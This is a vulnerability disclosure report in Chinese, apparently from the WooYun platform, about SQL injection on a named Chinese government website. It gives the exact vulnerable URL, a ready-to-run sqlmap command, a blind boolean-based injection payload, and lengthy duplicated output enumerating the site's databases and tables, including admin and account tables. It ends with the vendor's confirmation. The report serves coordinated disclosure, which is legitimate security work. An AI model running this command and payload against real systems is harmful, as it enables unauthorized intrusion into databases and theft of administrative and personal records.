2014-03-16:细节已通知厂商并且等待厂商处理中
2014-03-22:厂商已经确认,细节仅向厂商公开
2014-04-01:细节向核心白帽子及相关领域专家公开
2014-04-11:细节向普通白帽子公开
2014-04-21:细节向实习白帽子公开
2014-04-30:细节向公众公开
中华人民共和国国家外国专家局 SQL注射 SQLMAP 验证
State Administration of Foreign Experts Affairs, the P.R. of China SQLi
漏洞位置:
http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1
注意 level 5 别忘了
C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5
sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| cv_info |
| cvedu_info |
| cvexp_info |
| empl_info |
| job_info |
| jobapply_info |
| jobrecom_info |
| key_info |
| menu_info |
| myjoblist_info |
| news_info |
| para_info |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info |
| assign_info |
| col_info |
| top_info |
+----------------------------------------------+
Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplexpert_info |
| emplregis_info |
| enqu_info |
| expert_info |
| filelog_info |
| key_info |
| menu_info |
| news_info |
| para_info |
| proj_info |
| projexp_info |
| safeauser_info |
| tgproj_info |
| tgprojcost_info |
| tgprojref_info |
| tgprojsbm_info |
| yzproj_info |
| yzprojcost_info |
| yzprojref_info |
| yzprojsbm_info |
+----------------------------------------------+
Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| attach_info |
| catalog_info |
| ceproj_info |
| chklog_info |
| cont_info |
| cost_info |
| empl_info |
| filelog_info |
| key_info |
| member_info |
| menu_info |
| news_info |
| para_info |
| projexp_info |
| projext_info |
| projlog_info |
| safeauser_info |
| schedule_info |
+----------------------------------------------+
Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplacct_info |
| emplexpert_info |
仅获取数据表名称,不再继续深入
注意 level 5 别忘了
C:\Users\Administrator>sqlmap.py -u "http://www.yzxz.safea.gov.cn//2011_yzjdmd_detail.php?d=1" --tables --level 5
sqlmap identified the following injection points with a total of 572 HTTP(s) requests:
---
Place: GET
Parameter: d
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: d=1' RLIKE (SELECT (CASE WHEN (7980=7980) THEN 1 ELSE 0x28 END)) AND 'BJwf'='BJwf
---
web application technology: Apache 2.2.11, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
Database: hftp_mysqldb
[16 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| cv_info |
| cvedu_info |
| cvexp_info |
| empl_info |
| job_info |
| jobapply_info |
| jobrecom_info |
| key_info |
| menu_info |
| myjoblist_info |
| news_info |
| para_info |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: yzbbs_mysqldb
[4 tables]
+----------------------------------------------+
| art_info |
| assign_info |
| col_info |
| top_info |
+----------------------------------------------+
Database: eo_mysqldb
[29 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplexpert_info |
| emplregis_info |
| enqu_info |
| expert_info |
| filelog_info |
| key_info |
| menu_info |
| news_info |
| para_info |
| proj_info |
| projexp_info |
| safeauser_info |
| tgproj_info |
| tgprojcost_info |
| tgprojref_info |
| tgprojsbm_info |
| yzproj_info |
| yzprojcost_info |
| yzprojref_info |
| yzprojsbm_info |
+----------------------------------------------+
Database: cepms_mysqldb
[21 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| attach_info |
| catalog_info |
| ceproj_info |
| chklog_info |
| cont_info |
| cost_info |
| empl_info |
| filelog_info |
| key_info |
| member_info |
| menu_info |
| news_info |
| para_info |
| projexp_info |
| projext_info |
| projlog_info |
| safeauser_info |
| schedule_info |
+----------------------------------------------+
Database: yzpt_mysqldb
[31 tables]
+----------------------------------------------+
| acct_info |
| admin_info |
| agency_info |
| agent_info |
| assign_info |
| biz_info |
| catalog_info |
| dtrec_info |
| empl_info |
| emplacct_info |
| emplexpert_info |
仅获取数据表名称,不再继续深入
过滤得更加彻底一些吧
版权声明:转载请注明来源 lxj616@乌云 漏洞回应 厂商回应:危害等级:中
漏洞Rank:10
确认时间:2014-03-22 21:49
厂商回复:CNVD确认并复现所述情况,转由CNCERT上报给国家某信息安全协调机构,由其后续通报处置。
最新状态:暂无